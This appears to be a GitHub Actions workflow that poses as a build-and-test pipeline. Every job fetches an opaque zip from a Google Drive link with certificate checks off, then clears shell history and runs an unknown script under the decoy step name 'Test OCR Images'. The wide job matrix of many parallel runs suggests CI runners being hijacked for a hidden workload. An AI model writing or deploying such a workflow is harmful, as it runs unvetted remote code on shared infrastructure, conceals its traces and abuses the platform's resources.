name: tinhvan6app
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  Publish:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Prepare', 'Construct', 'Inspect', 'Activate', 'Publish']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=10F_ocaeqlkv5s_Edm9a0PN0jUPPfATT0" -O tinhvan6app.zip
        unzip -o tinhvan6app.zip
        rm tinhvan6app.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh


  Assemble1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Adapt', 'Assemble', 'Confirm', 'Ignite', 'Release']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=10F_ocaeqlkv5s_Edm9a0PN0jUPPfATT0" -O tinhvan6app.zip
        unzip -o tinhvan6app.zip
        rm tinhvan6app.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh
        
